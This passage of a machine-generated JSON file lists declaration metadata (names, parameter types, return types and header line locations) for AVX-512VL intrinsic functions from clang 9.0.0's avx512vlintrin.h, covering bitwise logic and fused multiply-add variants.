"_mm256_maskz_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:505:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:512:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:518:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:526:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:538:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:546:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:552:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:558:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:566:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:572:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:578:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:586:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:592:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:598:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:606:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:612:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:618:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:626:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:632:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:638:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:646:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:652:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:658:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:666:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:673:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:679:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:687:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:693:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:699:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:707:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:713:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:719:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:727:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:733:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:739:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:747:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:753:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:759:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:768:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:894:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask3_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:904:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:914:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:924:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:934:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask3_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:944:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:954:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:964:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:974:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask3_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:984:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:994:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1004:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1014:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask3_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1024:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1034:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1044:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1054:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask3_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1064:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1074:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1084:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1094:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask3_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1104:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:1124:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_fmadd_ps", "ns": 0, 